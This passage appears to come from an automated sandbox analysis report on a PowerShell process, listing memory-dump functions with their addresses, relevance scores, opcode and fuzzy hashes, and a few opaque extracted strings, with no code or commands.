                                            • Opcode Fuzzy Hash: aa6f69e5aa9fe326b7da92f071d626448b8029969702853e8e9d364ba4a4fcce
                                            • Instruction Fuzzy Hash: C831C5B0B00114AFD7149BA8C951FAE7AA3ABC5304F94C424EA196F781CF75ED418BA1
                                            Function 045795A8 Relevance: .3, Instructions: 327COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2171091198.0000000004570000.00000040.00000800.00020000.00000000.sdmp, Offset: 04570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4570000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dc3318e3156436548563859e874a89e8f221556ab3c79e02a099fb6e9d99da60
                                            • Instruction ID: 92688705a0f8e3d45b54ba588672dd2d098c513e56beae19e237b34b3fd16d2c
                                            • Opcode Fuzzy Hash: dc3318e3156436548563859e874a89e8f221556ab3c79e02a099fb6e9d99da60
                                            • Instruction Fuzzy Hash: B8D13AB4A012589FDB05CFA8E584A9DFBF2FF49310F258565E805AB362C730ED45DBA0
                                            Function 045772A0 Relevance: .3, Instructions: 317COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2171091198.0000000004570000.00000040.00000800.00020000.00000000.sdmp, Offset: 04570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4570000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6a9ea5fcde95f089d751dcf1094882d46a09c16db147d9a31d2dc0274f84acd4
                                            • Instruction ID: dc3c082e87ce769c9a51c95aee1681af656ec1845f984b24500c0b8169f5f614
                                            • Opcode Fuzzy Hash: 6a9ea5fcde95f089d751dcf1094882d46a09c16db147d9a31d2dc0274f84acd4
                                            • Instruction Fuzzy Hash: 4DC17B31A002089FDB14DFA4E984A9DBBF2FF89310F118569E406AB365DB34FD49DB80
                                            Function 0457EACD Relevance: .3, Instructions: 280COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2171091198.0000000004570000.00000040.00000800.00020000.00000000.sdmp, Offset: 04570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4570000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d5d5676026d1ea532604b7e5299e1c15ad4d0f4bfc198b395a7d5f4b59e06e9d
                                            • Instruction ID: 70d5412ef299d6b1ffadfd9fb17eb1b0725f93660e5393ec1d7e140236c80281
                                            • Opcode Fuzzy Hash: d5d5676026d1ea532604b7e5299e1c15ad4d0f4bfc198b395a7d5f4b59e06e9d
                                            • Instruction Fuzzy Hash: B2B13E70E003199FDB10CFA9E8867DDBBF2BF48314F148579D819A7294EB74A846DB81
                                            Function 0457F39C Relevance: .3, Instructions: 264COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2171091198.0000000004570000.00000040.00000800.00020000.00000000.sdmp, Offset: 04570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4570000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ca23b61c0f4b56a8edf75ab2b16902e007d606a80b047748794e04f32d516294
                                            • Instruction ID: b1a0101fb7c9c47206f6dd1e376e48548fdbb094630812c7b859f7812fcacbc5
                                            • Opcode Fuzzy Hash: ca23b61c0f4b56a8edf75ab2b16902e007d606a80b047748794e04f32d516294
                                            • Instruction Fuzzy Hash: A0A16EB2E002199FDB10CFA8E8857DDBBF2BF48314F148539D818A7294EB74A845DB91
                                            Function 070A5A88 Relevance: .2, Instructions: 239COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: da8428178c35b5328d6314d542cafad7f6f3276293593d07429f91440aa18a29
                                            • Instruction ID: 7460c3fa561ffffca2c0ee33a2815eb41c686bc3c671ba2b5f73e0c10b2df4aa
                                            • Opcode Fuzzy Hash: da8428178c35b5328d6314d542cafad7f6f3276293593d07429f91440aa18a29
                                            • Instruction Fuzzy Hash: CE7169B1B00306AFCB608AB98C416AEBBE1BFC5201F14897AD916CB341EA31D915C7A1
                                            Function 04577A68 Relevance: .2, Instructions: 196COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2171091198.0000000004570000.00000040.00000800.00020000.00000000.sdmp, Offset: 04570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4570000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1e3ffff0a8e207c3d99a77e25345e1dbce2461b50278d88e3e71c104d1c1a56d
                                            • Instruction ID: 0bcea34b959a45fb74ec5e992e8af2495d30a10e94a446ed85b05ddf3be0b66a
                                            • Opcode Fuzzy Hash: 1e3ffff0a8e207c3d99a77e25345e1dbce2461b50278d88e3e71c104d1c1a56d
                                            • Instruction Fuzzy Hash: 8D719E70A002198FCB14DF68E840A9EBBF2FF89354F14896AE419DB751DB71BD46CB90
                                            Function 070A4610 Relevance: .2, Instructions: 192COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4bca658d62872aec884e3cade3c2798db06caccdf7b8bbadd35c920afe420290
                                            • Instruction ID: f769a5cc31e995c405609640b6a3a33b2968942cfcf3eeb4fee06ecb223e6e94
                                            • Opcode Fuzzy Hash: 4bca658d62872aec884e3cade3c2798db06caccdf7b8bbadd35c920afe420290
                                            • Instruction Fuzzy Hash: B1718DB8A00245EFCB54CF98C541A6EBBF2AF89310F15C669E905AF751CB71EC41CB91
                                            Function 04577BD6 Relevance: .2, Instructions: 188COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2171091198.0000000004570000.00000040.00000800.00020000.00000000.sdmp, Offset: 04570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4570000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a70e4421c6f4524248b01ec56884b026728a56e9170314851aed96cf317ead30
                                            • Instruction ID: fbf92d71ff03b0ed99b8e05da80edca2499c9fcde152bdf1a377767b2520642b
                                            • Opcode Fuzzy Hash: a70e4421c6f4524248b01ec56884b026728a56e9170314851aed96cf317ead30
                                            • Instruction Fuzzy Hash: 40714A70A006189FDB14DFA4E480BADBBF2FF88304F148429D416AB7A1DB75BD46DB81
                                            Function 070A460A Relevance: .2, Instructions: 176COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2f47bc4d9709e004243f5c5c922743f4959f0bc2d066491967fdde032284a77b
                                            • Instruction ID: 78b80282b61be79e3337252db9c9117574ff6305804991c344ce24aa66a97ea3
                                            • Opcode Fuzzy Hash: 2f47bc4d9709e004243f5c5c922743f4959f0bc2d066491967fdde032284a77b
                                            • Instruction Fuzzy Hash: 9A61BFB8A00286EFCB54CF98C540AADBBF2EF89314F15C25AE8156B751C7B1E841CB51
                                            Function 045777F9 Relevance: .1, Instructions: 127COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2171091198.0000000004570000.00000040.00000800.00020000.00000000.sdmp, Offset: 04570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4570000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ce1a96a045c331e964196ac339d68bb9cd86ef020d1886d6f2da531f9b1b5f85
                                            • Instruction ID: adc6878b6f66767dc6cd34aba1548654119190c476c6c485927a1573f84a833e
                                            • Opcode Fuzzy Hash: ce1a96a045c331e964196ac339d68bb9cd86ef020d1886d6f2da531f9b1b5f85
                                            • Instruction Fuzzy Hash: 60417A34A002148FEB15DB64E854AAE7BB2FF8D754F184478E406EB7A0DB38BD41DB90
                                            Function 070A90F5 Relevance: .1, Instructions: 123COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f79b61ee2cb3557e0ce6c140a54f53ee6b517e86e651fffa1161789df719731b
                                            • Instruction ID: ef2078ac826de5e66d30e8ab2059c12394a6918e251b3587e4f077784e2d6e2a
                                            • Opcode Fuzzy Hash: f79b61ee2cb3557e0ce6c140a54f53ee6b517e86e651fffa1161789df719731b
                                            • Instruction Fuzzy Hash: A44114F1B14302AFCB608EE4C9046B97BE2AFC1348F5A86A6D9049F355D731E945C7A1
                                            Function 04577A53 Relevance: .1, Instructions: 120COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2171091198.0000000004570000.00000040.00000800.00020000.00000000.sdmp, Offset: 04570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4570000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5e4cbbc0b93f68b33e40f62ff50d012d7add28897abc54c5ce287f4b7301aec6
                                            • Instruction ID: ebd60cbe86a0917ae51c5326c7b44a8db6b129c5f1eed54ed1906ab9620a7e9d
                                            • Opcode Fuzzy Hash: 5e4cbbc0b93f68b33e40f62ff50d012d7add28897abc54c5ce287f4b7301aec6
                                            • Instruction Fuzzy Hash: F7417C70A002189FDB14DFA9E8447EEBBF2BF89304F148469D405AB7A1DB74B945CF91
                                            Function 04572BB0 Relevance: .1, Instructions: 110COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2171091198.0000000004570000.00000040.00000800.00020000.00000000.sdmp, Offset: 04570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4570000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e2a0073cc9038832604d5a528f1647bd7eb4fe8a6ee2634b0439f9146032fb0a
                                            • Instruction ID: a58281060b47e56c9eae9de5d1c8449dfc237a4a1b5418bdbb612608c20219b5
                                            • Opcode Fuzzy Hash: e2a0073cc9038832604d5a528f1647bd7eb4fe8a6ee2634b0439f9146032fb0a
                                            • Instruction Fuzzy Hash: 8C4148B4A001099FCB1ACF58D494AAEFBB1FF48310F5585A9E815AB365C736FC51CBA0
                                            Function 070A0DE8 Relevance: .1, Instructions: 94COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a70789b9a546f44c0c19223d5d014172fc66ba4f0e7badf59402ba500de66ecc
                                            • Instruction ID: 0991dfd158f65f427ec6cb67111ae44c5da56c917f60b890262a8c54681d7576
                                            • Opcode Fuzzy Hash: a70789b9a546f44c0c19223d5d014172fc66ba4f0e7badf59402ba500de66ecc
                                            • Instruction Fuzzy Hash: 03215AB130031EBBC7649AE9880173B76D69BD8719F14893EA64ACB2C4EE75D8409361
                                            Function 0457BCA0 Relevance: .1, Instructions: 92COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2171091198.0000000004570000.00000040.00000800.00020000.00000000.sdmp, Offset: 04570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4570000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7ea17bcc9b883d5ce9d84ab01145a74eec6a753547fdf04442d39ad1dee5cfa5
                                            • Instruction ID: 83dd9cf4e81bfc5e435085c88548729c47de5d5390f3cfb74d3ec6bd55247dc7
                                            • Opcode Fuzzy Hash: 7ea17bcc9b883d5ce9d84ab01145a74eec6a753547fdf04442d39ad1dee5cfa5
                                            • Instruction Fuzzy Hash: F3312A30B011189FCB26DB64D8956EEB7B2BF89304F1084E9D409AB355CB35AE86DF81
                                            Function 070A5A69 Relevance: .1, Instructions: 87COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 88b084a11d84803cf5309e110f0540957d1265c469cd3ad1303fff66107765e9
                                            • Instruction ID: 9eca81ec2a9e4ba5b6fc72c109aa289c5cafdc93a8f571baca553dfd23dfe216
                                            • Opcode Fuzzy Hash: 88b084a11d84803cf5309e110f0540957d1265c469cd3ad1303fff66107765e9
                                            • Instruction Fuzzy Hash: 822139F0704342BFC7514EB44D1177E7FE1ABC5300F48456AE905DB292EB3A9A14C3A2
                                            Function 070A5A30 Relevance: .1, Instructions: 84COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 52d418c24dfb63800dd0e313998fc8a2be46636833757513d7bdc07d634a584e
                                            • Instruction ID: 5c4987e2434bda4595152e13abca8aa539a55e80c8db100df6350a5b17d4da20
                                            • Opcode Fuzzy Hash: 52d418c24dfb63800dd0e313998fc8a2be46636833757513d7bdc07d634a584e
                                            • Instruction Fuzzy Hash: EC218BF0704343ABCB604EA089013BDBFD2AFC2354F584669E5419F281DB369961D391
                                            Function 070A0DCD Relevance: .1, Instructions: 79COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ce46d71f85750b00fc61f0a7e65661dec99db614d0456e0b2ba2b6fe205cdea2
                                            • Instruction ID: 95c299ae3be8723f5f421517757e0323597b560895d0a9301cacfb887a3fe41a
                                            • Opcode Fuzzy Hash: ce46d71f85750b00fc61f0a7e65661dec99db614d0456e0b2ba2b6fe205cdea2
                                            • Instruction Fuzzy Hash: AD21BEF170438E7BC7644AB588007363BD65FA5704F18892EA645CB2C6DA78D940D361
                                            Function 070A5A49 Relevance: .1, Instructions: 74COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9ed3e6ef5f00a85abeb25bd39b1b5496c742dc623409ccb166af973849dba48f
                                            • Instruction ID: b13bdee5fba9b5d430a484870c4e6aed1739ec025efc4e2d40bb97ec24dcdd8a
                                            • Opcode Fuzzy Hash: 9ed3e6ef5f00a85abeb25bd39b1b5496c742dc623409ccb166af973849dba48f
                                            • Instruction Fuzzy Hash: 81218BF5304302BFC7600EB049417BDBBD2AFC1345F988569E6454F282CB36DA65C3A1
                                            Function 04579597 Relevance: .1, Instructions: 64COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2171091198.0000000004570000.00000040.00000800.00020000.00000000.sdmp, Offset: 04570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4570000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 60a5eece63ab67d8a56493dd7ca2240e6b0ab3843f59a47cfe2161f47ccfb8da
                                            • Instruction ID: a90f2d9e2ff54a0abc40d2b31ef2811adc826abb9968541c00b9193f44207863
                                            • Opcode Fuzzy Hash: 60a5eece63ab67d8a56493dd7ca2240e6b0ab3843f59a47cfe2161f47ccfb8da
                                            • Instruction Fuzzy Hash: FA211AB4A006199FCB00DF58D4809AAFBB5FF49310B158596E809EB352C731FD41CBA1
                                            Function 070A0BD8 Relevance: .1, Instructions: 52COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c4227c794c4b5ee48baa6d7215f7fe68e50ab73246a3814e2ba6d0d7c43498f8
                                            • Instruction ID: 500d8e9022dc83f1e8055b59416ccd35d472cf2901be971c13f8c99f6f44b2ff
                                            • Opcode Fuzzy Hash: c4227c794c4b5ee48baa6d7215f7fe68e50ab73246a3814e2ba6d0d7c43498f8
                                            • Instruction Fuzzy Hash: 730147B631031EABCBA45AEAD40027ABBD5DBC5223F14C43EE859CB600EA32C845C360
                                            Function 070A17F7 Relevance: .0, Instructions: 6COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6eaf82c389cfa2160d53d5dbc0a9cc261d9f77c77bcafe436c842d63c71d3c9b
                                            • Instruction ID: 197065644335616919e7db57d86c727136717fddd7a9f7b8aab5ed9e302c2f87
                                            • Opcode Fuzzy Hash: 6eaf82c389cfa2160d53d5dbc0a9cc261d9f77c77bcafe436c842d63c71d3c9b
                                            • Instruction Fuzzy Hash: DBB012751051804FC201CB10C850400BB209F92208318C0CA94048B253CB23DE03C700

                                            Non-executed Functions

                                            Function 070A8778 Relevance: 14.2, Strings: 11, Instructions: 496COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$wl$wl$wl$wl
                                            • API String ID: 0-4001172130
                                            • Opcode ID: 805c2df0cf1f9b23850f4009a7114f5713e99b11b7d92e3570aba60ab313b80e
                                            • Instruction ID: e49c612b30f3a6971fd4e60c7c16cbba4a15d44aa8cc6cf3c466f2c9112a4bca
                                            • Opcode Fuzzy Hash: 805c2df0cf1f9b23850f4009a7114f5713e99b11b7d92e3570aba60ab313b80e
                                            • Instruction Fuzzy Hash: DDF14BB1704316AFCB668BA888016AABBF1AFC6311F18C56AD905CF391DF31DD45C7A1
                                            Function 070AD0B8 Relevance: 14.1, Strings: 11, Instructions: 367COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                            • API String ID: 0-2779274079
                                            • Opcode ID: df6b4031da26942525c00bac8416b514f5a1000ce08d8eba4b531efd1af4af74
                                            • Instruction ID: ce53375b17f85919c89ffa806d68706f340369bd1df988c1534289214613e2db
                                            • Opcode Fuzzy Hash: df6b4031da26942525c00bac8416b514f5a1000ce08d8eba4b531efd1af4af74
                                            • Instruction Fuzzy Hash: E0C115B1B0420AFFCF548FA8C4046AE7BE1EF86711F14C6AAD8158FA49DB35D845C791
                                            Function 070A7738 Relevance: 11.7, Strings: 9, Instructions: 419COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                            • API String ID: 0-3466928173
                                            • Opcode ID: f42f0512461877d85a05640c506bd781c2898a5240cc4859e31dbaf8db941754
                                            • Instruction ID: 7d1f58da50dedecb4ec0ad8beff0ac25ff265a1a7cdd6cdee566fa58aef25954
                                            • Opcode Fuzzy Hash: f42f0512461877d85a05640c506bd781c2898a5240cc4859e31dbaf8db941754
                                            • Instruction Fuzzy Hash: 62D148F0B14346AFCB658BB8881076E7BE2AFC5211F14C5BAD545CF292DE31C945C7A2
                                            Function 070AE1D4 Relevance: 8.9, Strings: 7, Instructions: 160COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$TQcq$TQcq$tP^q$$^q$$^q$$^q
                                            • API String ID: 0-2461640029
                                            • Opcode ID: 1bf9c48bc9c6d7dbbbdcf06f9bb244fe30a02ac638e9e21b77966deba07db38f
                                            • Instruction ID: 0f9ffaa7a30116f746f9864be43f85ca3ee6f4e8b25fe3bce09aa14435afbafd
                                            • Opcode Fuzzy Hash: 1bf9c48bc9c6d7dbbbdcf06f9bb244fe30a02ac638e9e21b77966deba07db38f
                                            • Instruction Fuzzy Hash: A35132B1A00206FFDB64CEA4C50A7AA7BF1BF41711F5486AAE8108B291C3B5DC44CBA1
                                            Function 070ADC79 Relevance: 7.7, Strings: 6, Instructions: 168COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$d%dq$d%dq$d%dq$tP^q$$^q
                                            • API String ID: 0-2098638132
                                            • Opcode ID: bee7d513837f6e7a6b25b879fe254fe28e1b1c6d53de6e0f6d74279110eb5378
                                            • Instruction ID: 70592d8039efcff48c3ed368efdf9bfc30efb02dfcffc782bab5338727028352
                                            • Opcode Fuzzy Hash: bee7d513837f6e7a6b25b879fe254fe28e1b1c6d53de6e0f6d74279110eb5378
                                            • Instruction Fuzzy Hash: 415105F0714206EFCB28CF94C540AAABBF2AF95354F188696E8119F799C731DD44C7A1
                                            Function 070A0285 Relevance: 7.6, Strings: 6, Instructions: 79COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q
                                            • API String ID: 0-1041444323
                                            • Opcode ID: 50ffa95f563c579bead7def3cfa01211533529cf79388c6af9e953431f492bcb
                                            • Instruction ID: 9b4c6e731d373a08c23363984fd295875ac8448f6af9ba4cabe992bae6cb4ce7
                                            • Opcode Fuzzy Hash: 50ffa95f563c579bead7def3cfa01211533529cf79388c6af9e953431f492bcb
                                            • Instruction Fuzzy Hash: AC213DB1F0835F6FC72A16A8142027A5FE65FC2651F39469BD445DF346EF218C498393
                                            Function 070AEBDC Relevance: 6.4, Strings: 5, Instructions: 194COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$tP^q$$^q$$^q$$^q
                                            • API String ID: 0-3997570045
                                            • Opcode ID: 7d231225d9ddf7f95130fa8ccfd0fd8386ff2c1cf6b3d168d65ba5b1100f9ecd
                                            • Instruction ID: 501dd16d6a5270d1c59738ce56a7a7c9121ce555497bb6e498e0d9ddfe7eef32
                                            • Opcode Fuzzy Hash: 7d231225d9ddf7f95130fa8ccfd0fd8386ff2c1cf6b3d168d65ba5b1100f9ecd
                                            • Instruction Fuzzy Hash: CD6114F060020BFFDB64CE94C946BBA7BE1AF45705F588665E8205F291C731ED81CBA1
                                            Function 070AEBF0 Relevance: 6.4, Strings: 5, Instructions: 185COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$tP^q$$^q$$^q$$^q
                                            • API String ID: 0-3997570045
                                            • Opcode ID: de868c2378d3b563987c015c1aad5b4738aa82b0a2632d0f425b5290b577dd1d
                                            • Instruction ID: 2b2066e3f053da5d194c972f047070ec91bdf9972a408fa39761cd1f18f469a6
                                            • Opcode Fuzzy Hash: de868c2378d3b563987c015c1aad5b4738aa82b0a2632d0f425b5290b577dd1d
                                            • Instruction Fuzzy Hash: AE61F3F060020BFFDB68CE94C5467BAB7E1AF45705F588665E8205F291C731ED81CBA1
                                            Function 070A0470 Relevance: 6.4, Strings: 5, Instructions: 148COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                            • API String ID: 0-3272787073
                                            • Opcode ID: 020bbb542a8b05d2362e20cd47cfd7893392a4f766e69c1cfec9369dcf6fd7aa
                                            • Instruction ID: b870331f4483de86f5ffcd8cf447e40ec16802fba7048f88f15ab91af13c558d
                                            • Opcode Fuzzy Hash: 020bbb542a8b05d2362e20cd47cfd7893392a4f766e69c1cfec9369dcf6fd7aa
                                            • Instruction Fuzzy Hash: 6F4124B0B0430AAFCF654EB488106BF7FE29FC2301F14856ADA058B291EF35C945C7A2
                                            Function 070ADDBE Relevance: 6.3, Strings: 5, Instructions: 85COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$d%dq$d%dq$d%dq$tP^q
                                            • API String ID: 0-3846404929
                                            • Opcode ID: aba65d5f77314a7497611f5769b90d3a5ec5f5a1f37f34a02e884783e1188274
                                            • Instruction ID: 37415a1f105163efe905d1050453a872cd6ae3c69752e08ed9e42311e9ea6ce0
                                            • Opcode Fuzzy Hash: aba65d5f77314a7497611f5769b90d3a5ec5f5a1f37f34a02e884783e1188274
